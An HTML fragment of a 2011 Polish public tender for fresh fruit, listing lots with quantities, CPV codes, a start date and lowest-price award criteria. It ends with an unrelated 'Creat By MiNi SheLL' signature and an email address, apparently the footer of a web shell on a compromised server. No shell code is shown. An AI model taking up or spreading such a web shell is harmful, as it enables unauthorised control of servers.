<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Truskawka świeża gr. II	kg	175,00
2.	Jabłka wczesne gr. II	kg	700,00
3.	Wiśnia Świeża gr. II	kg	150,00
4.	Czereśnie świeże gr. II	kg	30,00
5.	Śliwki świeże gr. II	kg	170,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.23.13-0, 03.22.23.21-9, 03.22.23.33-6, 03.22.23.30-5, 03.22.23.34-3, 03.22.23.22-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE 6  Owoce   ( Obszar III -  woj. małopolskie świętokrzyskie ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Truskawka świeża gr. II	kg	620,00
2.	Jabłka wczesne gr. II	kg	4 750,00
3.	Wiśnia Świeża gr. II	kg	560,00
4.	Czereśnie świeże gr. II	kg	140,00
5.	Śliwki świeże gr. II	kg	560,00
6.	Gruszki świeże gr. II	kg	600,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.23.13-0, 03.22.23.21-9, 03.22.23.33-6, 03.22.23.30-5, 03.22.23.34-3, 03.22.23.22-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com